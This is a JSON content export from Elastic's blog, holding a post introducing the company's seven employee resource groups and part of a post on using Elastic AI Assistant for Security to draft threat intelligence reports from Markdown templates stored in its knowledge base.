Elasticsearch","updated_at":"2024-12-06T15:47:06.029Z","updated_by":"blt3e52848e0cb3c394","url":"/blog/evolution-workplace-search-private-data-elasticsearch","publish_details":{"time":"2024-12-06T15:47:18.115Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt97710d4ffb31ab7e","_version":14,"locale":"en-us","ACL":{},"abstract_l10n":"Employee resource groups build a sense of community and belonging, provide an inclusive space for people with similar experiences, empower employees to share their voice, and amplify our DEI initiatives. Here’s a bit about each one.","author":["blt7fc3768df8cad1f6"],"category":["bltc253e0851420b088"],"created_at":"2022-09-09T17:32:14.785Z","created_by":"blt084c51ee83c3308f","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csd173e6c9971bb794"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 11pt;\"\u003eEmployee resource groups, or as we like to call them, Elastician resource groups, have been a part of Elastic’s culture since 2016. They started as organic Slack channels that Elasticians could join to connect with others from similar backgrounds or experiences.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 11pt;\"\u003eIn 2021, we formalized these ERGs to ensure that the members would have structure, budget, and ultimately, a voice based on any dimension of diversity, allyship, and advocacy. Formalizing these ERGs was an important step in broadening the impact of our collective diversity, equity and inclusion (DEI) initiatives.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 11pt;\"\u003eERGs are aligned to shared identities, interests, affinities, or allyships and have visions and goals they are working towards. They allow Elasticians to build a sense of community and belonging outside of their immediate team and allow for knowledge sharing, learning and development, and networking.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 11pt;\"\u003eDiversity has always been a part of our culture. We’re a \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/culture-elastic-distributed-by-design\" target=\"_self\"\u003e\u003cspan style=\"font-size: 11pt;\"\u003edistributed organization\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 11pt;\"\u003e, with employees in more than 40 countries around the world. What unites us is our Source Code, a shared set of ideas that we’re always working towards.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 11pt;\"\u003eOne tenet of our Source Code is “As YOU, Are” which means that we celebrate our differences and encourage everyone to come as you are.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 11pt;\"\u003e“The Source Code is the basis for our entire DEI philosophy,” says Karen Penn, Elastic’s Head of DEI. “It’s critically important when you have employees from 44 countries. On a daily basis, things can be misinterpreted, but it’s important to not assume malice. We have this set of ideals and values to show that.”\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 11pt;\"\u003eShe also explains her tool for managing awkward occurrences when they arise, especially around culture differences.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 11pt;\"\u003e“We have to respect the pause—let people pause and explain,” she says. At Elastic, we don’t shy away from conflict, but instead enable Elasticians to address things in a meaningful way. That’s how you learn and grow as people, and as an organization.\u003c/span\u003e\u003c/p\u003e\u003ch3\u003eOur Core ERGs\u003cspan style=\"font-size: 11pt;\"\u003e\u003c/span\u003e\u003c/h3\u003e\u003cp\u003e\u003cspan style=\"font-size: 11pt;\"\u003eWe have seven formal ERGs: \u003ca href=\"https://www.elastic.co/blog/culture-meet-accessibles\" target=\"_self\"\u003eThe Accessibles\u003c/a\u003e, \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/culture-ergs-encourage-you-to-come-as-you-are-blasticians-introduction\" target=\"_self\"\u003e\u003cspan style=\"font-size: 11pt;\"\u003eBlasticians\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 11pt;\"\u003e, \u003ca href=\"https://www.elastic.co/blog/culture-ergs-encourage-you-to-come-as-you-are-meet-elastasians\" target=\"_self\"\u003eElastAsians\u003c/a\u003e, E\u003ca href=\"https://www.elastic.co/blog/culture-ergs-encourage-you-to-come-as-you-are-meet-elasticians-unidos\" target=\"_self\"\u003elasticians Unidos\u003c/a\u003e, \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/culture-meet-rainbow-stack-erg\" target=\"_self\"\u003e\u003cspan style=\"font-size: 11pt;\"\u003eRainbow Stack\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 11pt;\"\u003e, \u003ca href=\"https://www.elastic.co/blog/culture-ergs-encourage-you-to-come-as-you-are-meet-mil-asticians\" target=\"_self\"\u003eMil-Asticians\u003c/a\u003e, and \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/culture-ergs-encourage-you-to-come-as-you-are-meet-women-of-elastic\" target=\"_self\"\u003e\u003cspan style=\"font-size: 11pt;\"\u003eWomen of Elastic\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 11pt;\"\u003e.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 11pt;\"\u003eWe believe that these groups benefit the company and Elasticians by building a sense of community and belonging, providing an inclusive space for people with similar experiences, empowering employees to share their voice, and amplifying our DEI initiatives.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 11pt;\"\u003eHere’s a bit about each one:\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 11pt;\"\u003e\u003cstrong\u003eThe Accessibles\u003c/strong\u003e\u003c/span\u003e\u003cstrong\u003e\u003c/strong\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 11pt;\"\u003eThe Accessibles\u003c/span\u003e\u003cspan style=\"font-size: 10.5pt;\"\u003e ensure Elastic events, facilities, and the tools we use to get our jobs done are accessible to all of our employees and customers. The goal is to give equitable access to everyone along the continuum of human ability and experience.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 11pt;\"\u003eThe group \u003c/span\u003e\u003cspan style=\"font-size: 10.5pt;\"\u003eactively works to create and develop a disability inclusive workplace by building more awareness and empathy towards those with disabilities, understanding and addressing barriers, investing in solutions and training that help those with and without disabilities.\u003ca href=\"https://www.elastic.co/blog/culture-meet-accessibles\" target=\"_self\"\u003e\u0026nbsp;Read more\u003c/a\u003e about the group.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 11pt;\"\u003e\u003cstrong\u003eBlasticians\u003c/strong\u003e\u003c/span\u003e\u003cstrong\u003e\u003c/strong\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 11pt;\"\u003eBlasticians want to create more long-term Black representation at Elastic and provide a support system to Black Elasticians. As part of their work, they’re\u0026nbsp; developing initiatives to educate Black youth about career paths in technology. \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/culture-ergs-encourage-you-to-come-as-you-are-blasticians-introduction\" target=\"_self\"\u003e\u003cspan style=\"font-size: 11pt;\"\u003eRead more\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 11pt;\"\u003e about the group.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 11pt;\"\u003e\u003cstrong\u003eElastAsians\u003c/strong\u003e\u003c/span\u003e\u003cstrong\u003e\u003c/strong\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 11pt;\"\u003eElastiAsians is a support network for Elasticians from different ethnic groups in Asia and the Pacific Islands and their allies. Similarly to Blasticians, they want to diversify hiring efforts to include more geographical areas and increase the visibility of Asian and Pacific Islander employees at Elastic.\u0026nbsp;\u003ca href=\"https://www.elastic.co/blog/culture-ergs-encourage-you-to-come-as-you-are-meet-elastasians\" target=\"_self\"\u003eRead more\u003c/a\u003e about the group.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 11pt;\"\u003e\u003cstrong\u003eElasticians Unidos\u003c/strong\u003e\u003c/span\u003e\u003cstrong\u003e\u003c/strong\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 11pt;\"\u003eElasticians Unidos is for all Elasticians who identify as Latinx and Hispanic. The goal is to help people find a support group of people that they can relate to, so they can find connections and relationships across the country. They hope to showcase the culture, grow the community, and help more Latinx and Hispanic people gain influence, both internally and externally. Read more here.\u0026nbsp;\u003ca href=\"https://www.elastic.co/blog/culture-ergs-encourage-you-to-come-as-you-are-meet-elasticians-unidos\" target=\"_self\"\u003eRead more\u003c/a\u003e about the group.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 11pt;\"\u003e\u003cstrong\u003eRainbow Stack\u003c/strong\u003e\u003c/span\u003e\u003cstrong\u003e\u003c/strong\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 11pt;\"\u003eRainbow Stack welcomes everyone who identifies as LGBTQIA+ and their allies. The group has big goals to expand Pride month into a Pride season and offer year-round resources, set up events in the community, and continue to develop empathy and community among members. \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/culture-meet-rainbow-stack-erg\" target=\"_self\"\u003e\u003cspan style=\"font-size: 11pt;\"\u003eRead more\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 11pt;\"\u003e about the group.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 11pt;\"\u003e\u003cstrong\u003eMil-Asticians\u003c/strong\u003e\u003c/span\u003e\u003cstrong\u003e\u003c/strong\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 11pt;\"\u003eThe Mil-Asticians facilitate a network of employees interested in or involved with the military community. Members include veterans, employees serving in active duty in any branch of the military including the Guard/Reserve, and employees with friends or family in the military.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 11pt;\"\u003eThey hope to foster a military-friendly environment at Elastic, provide networking opportunities, support Elasticians who serve or who have family members that are deployed, and promote recruitment of candidates with a military background.\u0026nbsp;\u003ca href=\"https://www.elastic.co/blog/culture-ergs-encourage-you-to-come-as-you-are-meet-mil-asticians\" target=\"_self\"\u003eRead more\u003c/a\u003e about the group.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 11pt;\"\u003e\u003cstrong\u003eWomen of Elastic\u0026nbsp;\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 11pt;\"\u003eWomen of Elastic is open to anyone who identifies as a woman at Elastic. The group is big on community and finding connection with others at Elastic by sharing stories and facilitating events. In addition, they work to encourage more women to apply to tech roles. \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/culture-ergs-encourage-you-to-come-as-you-are-meet-women-of-elastic\"\u003e\u003cspan style=\"font-size: 11pt;\"\u003eRead more\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 11pt;\"\u003e about the group.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csd72225ce75019ced"}}}],"publish_date":"2022-09-12","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[{"uid":"blt6e41c56d3689487a","_content_type_uid":"tags_culture"},{"uid":"blt0f23343b87b20630","_content_type_uid":"tags_culture"},{"uid":"blt4bebb28f8e616e9a","_content_type_uid":"tags_culture"},{"uid":"bltf53e7d9e6890ffe1","_content_type_uid":"tags_culture"},{"uid":"bltc1899ef5008b2218","_content_type_uid":"tags_culture"}],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[],"tags_use_case":[],"thumbnail_image":{"_version":1,"is_dir":false,"uid":"blt7218cc07d77b7065","ACL":{},"content_type":"image/png","created_at":"2022-09-09T17:30:32.684Z","created_by":"blt084c51ee83c3308f","file_size":"152109","filename":"9.0-ERG-blog-1680x980.png","parent_uid":null,"tags":[],"title":"9.0-ERG-blog-1680x980.png","updated_at":"2022-09-09T17:30:32.684Z","updated_by":"blt084c51ee83c3308f","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-09-12T05:00:00.126Z","user":"blt2e0950f439c6192e"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt7218cc07d77b7065/631b78388c6aa1311ba19e57/9.0-ERG-blog-1680x980.png"},"title":"Meet our 7 ERGs who are building communities at Elastic","title_l10n":"Meet our 7 ERGs who are building communities at Elastic","updated_at":"2024-12-06T05:40:36.794Z","updated_by":"blte369ea3bcd6ac892","url":"/blog/culture-meet-our-7-ergs-who-are-building-communities-at-elastic","publish_details":{"time":"2024-12-06T05:40:41.943Z","user":"blte369ea3bcd6ac892","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt057cdaae95c92924","_version":7,"locale":"en-us","ACL":{},"abstract_l10n":"Analysts are tasked with the critical job of identifying and analyzing threats. Reporting on threats can be slow and tedious. The Elastic AI Assistant for Security streamlines reporting through the use of templates and a robust knowledge base.","author":["blt67aad78f0091b08c"],"category":["blte5cc8450a098ce5e"],"created_at":"2024-12-04T21:07:52.359Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"Empowering analysts with AI-driven reporting","_metadata":{"uid":"cs16b2d4035f1183cf"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn the ever-evolving landscape of cybersecurity, threat analysts are constantly inundated with new threat intelligence (TI) data. The challenge lies not only in understanding and mitigating these threats but also in efficiently documenting and reporting them. Traditional methods of threat intel reporting can be time-consuming and often require meticulous attention to detail. To address this, we introduced a streamlined approach using \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/security-assistant.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic AI Assistant for Security\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e to help with the process of writing these reports. This method uses markdown templates and the Elastic AI Assistant's knowledge base to produce comprehensive and efficient reports.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Transforming threat intel documentation and reporting","_metadata":{"uid":"cs3cc88cf6b8f2f7d9"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThreat analysts play a crucial role in identifying and mitigating potential threats. However, the process of documenting these threats can be laborious. By using Elastic AI Assistant for Security, analysts can focus more on analyzing threats and less on the tedious aspects of reporting. By using Elastic AI Assistant for Security, we can pull relevant information from open source threat reporting and format that information using templates stored in the AI Assistant’s knowledge base. This approach is not a replacement for threat analysts but a tool to enhance their efficiency.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eUsing Elastic AI Assistant for Security, threat intel professionals are able to analyze the information on the topic they’re reporting on in a standardized format conducive to their reporting workflow. This saves an enormous amount of time by removing many of the manual steps of gathering and normalizing threat data for specific reporting.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Nine steps to produce threat reporting","_metadata":{"uid":"cs2101245085e1fb6b"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eEvery threat intel program will have its own processes for producing threat reporting. At Elastic, we’ve broken this process down into the nine steps below. However, the basic concepts of using Elastic AI Assistant can be modified and incorporated into virtually any workflow for producing threat reporting:\u003c/span\u003e\u003c/p\u003e\u003col\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eUnderstand the types of reports needed.\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eCreate templates for each of those report types.\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eUse Elastic AI Assistant to store those templates in the knowledge base.\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eDevelop a method for gathering threat reporting and data.\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eFeed threat data to Elastic AI Assistant for the appropriate templates.\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eProvide additional context or data.\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eAnalyze the threat data within the report template for accuracy and understanding.\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eProvide the relevance, impact, and any recommendations.\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003ePublish the report.\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ol\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eUsing these workflows requires some \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/introducing-elastic-ai-assistant\"\u003e\u003cspan style='font-size: 12pt;'\u003esetup for Elastic AI Assistant\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/security-assistant.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eSpecific documentation for Elastic AI Assistant for Security\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e is also available. Now, let’s dive deeper into each of the nine steps.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"1. Understand the types of reports needed","_metadata":{"uid":"cs9eea31c9f450b227"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eEvery threat intelligence program is going to be different with different types of reporting requirements. Understanding the stakeholders and how they’re going to consume and use threat intel reporting is critical to a successful program. Some programs may only need one or two types of reports, while others may need many more than that. At Elastic, we use several types of templates to cater to different reporting needs. These include:\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eIntelligence report (INTREP):\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e INTREPs provide a comprehensive overview of a specific threat, including detailed analysis and mitigation steps. This is our most common type of report. It can deal with anything from the discovery of a new malware family to a recent update of threat actor tactics, techniques, and procedures (TTPs.)\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSignificant activity report (SIGACT):\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e These reports focus on specific, significant threat activities or incidents. Typically, this type of report will be produced to describe a widely publicized event, such as a large data breach or geopolitical event.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eThreat trend report (TTR):\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e TTRs analyze trends in threat activities over a period of time, helping to identify patterns and predict future threats. TTRs typically stem from other report types when several reports share common characteristics over time, such as repeated use of a specific TTP or attack themes that happen around certain times of year, such as tax season.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eThreat actor profiles (TAP): \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eTAPs\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eprofile specific threat actors, detailing their TTPs, historical activities, and potential targets. These reports are regularly updated when new information about a threat actor comes to light and help analysts understand how those threat groups operate and what potential future targets may be.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eFLASH reports: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eThese reports are meant for topics that need to be disseminated quickly. Typically a FLASH report is used as a way to get information out to a wider audience while additional analysis takes place. It is not uncommon for a FLASH report to later be converted into a longer report of another type once additional analysis is complete.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"2. Create Markdown templates","_metadata":{"uid":"csc72260e76b94911d"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe second step in this process is to create markdown templates for the different threat intel report types. These templates serve as a standardized format that ensures consistency and comprehensiveness in reporting. They will also allow the Elastic AI Assistant to put the appropriate information into the appropriate places, saving time and tedious effort for analysts.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThere are a number of different ways to create these templates, but the best approach is the approach that works most efficiently for each specific threat intel program. At Elastic, we use Google Docs to create our templates using the branding, style, images, and sections that work for our needs. We then use the \u003c/span\u003e\u003ca href=\"https://support.google.com/docs/answer/12014036?hl=en\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eMarkdown conversion tool\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e built into Google Docs to convert our templates to the Markdown format.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe process for other threat intel programs may look different, but the important part is that all of the templates for threat reporting are converted to Markdown so that Elastic AI Assistant can process them.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs5c6b2913cd23f160"}}},{"image":{"image":{"uid":"blt2f3c05e373b8146a","_version":1,"title":"image5.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-12-05T14:02:10.608Z","updated_at":"2024-12-05T14:02:10.608Z","content_type":"image/png","file_size":"501579","filename":"image5.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-12-05T14:50:44.323Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt2f3c05e373b8146a/6751b26290b46f0bad517cf0/image5.png"},"_metadata":{"uid":"cs9aed142ecc722db5"},"caption_l10n":"","alt_text_l10n":"Threat Trend Report (TTR)","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"callout":{"title_l10n":"","_metadata":{"uid":"cs6102dd01cf074f83"},"paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eFun fact:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e If you need help crafting templates or specific types of reporting in Markdown, Elastic AI Assistant can help out with that, too! Try something like \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003e\u003cstrong\u003e“You are an expert threat intelligence analyst. Help me develop templates that can be used for threat intelligence reporting of the following types:\u0026nbsp; Intelligence report (INTREP), significant activity report (SIGACT), and threat trend report (TTR).”\u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003c/span\u003e\u003c/p\u003e","callout_reference":[],"callout_type":"Information (info)"}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cse116eff38fcd8932"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eYou can fine-tune the prompt to add in additional report types, specific sections necessary in each report, or formatting options.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"3. Use the Elastic AI Assistant to store templates in the knowledge base","_metadata":{"uid":"cs648fbe4168f4c3e9"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOnce the markdown templates are created, the next step is to store them in Elastic AI Assistant's knowledge base (KB). This allows analysts to quickly retrieve and use these templates when needed.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSteps to store templates:\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e1. Access the Elastic AI Assistant: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eOpen the Elastic AI Assistant interface. This can be done by clicking \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eAI Assistant\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e in the top right corner of Kibana. This will open a new prompt.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs52604641c1584671"}}},{"image":{"image":{"uid":"blt094873ada3803396","_version":1,"title":"image11.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-12-05T14:02:35.539Z","updated_at":"2024-12-05T14:02:35.539Z","content_type":"image/png","file_size":"118701","filename":"image11.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-12-05T14:50:44.400Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt094873ada3803396/6751b27b453e66183466c8d8/image11.png"},"_metadata":{"uid":"csfe75b88802506661"},"caption_l10n":"","alt_text_l10n":"accessing ai assistant","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs3c643e07696ba663"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e2. Store the template:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e There are multiple ways to store things in Elastic AI Assistant’s knowledge base for future reference. In version 8.16.0, Elastic made some really great improvements to how the KB is managed and used. Storing things in the KB is now easier than ever, and managing items is simple as well:\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFrom the Elastic AI Assistant, navigate to the KB management page by clicking in the upper right corner of the assistant window. Then, click \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eKnowledge Base\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs239cd31f720068a3"}}},{"image":{"image":{"uid":"bltfb3bfc7deeab7366","_version":1,"title":"image6.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-12-05T14:02:59.347Z","updated_at":"2024-12-05T14:02:59.347Z","content_type":"image/png","file_size":"27722","filename":"image6.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-12-05T14:50:44.447Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltfb3bfc7deeab7366/6751b293f25eb20cf6b18a10/image6.png"},"_metadata":{"uid":"cs6d73e870599e1fbd"},"caption_l10n":"","alt_text_l10n":"knowledge base dropdown","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":"width-medium: 50%"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csa59f17ff7d340c30"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFrom here, you can see all items already added to the KB as well as a button in the upper right corner that will allow you to directly upload items. Click \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e+ New\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e to add an item to the KB. This will give you a dropdown that looks like this:\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFor our purposes, select \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eDocument\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. For more details on different types of information that can be added to a KB, you can reference the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/ai-assistant-knowledge-base.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eAI Assistant Knowledge Base documentation\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 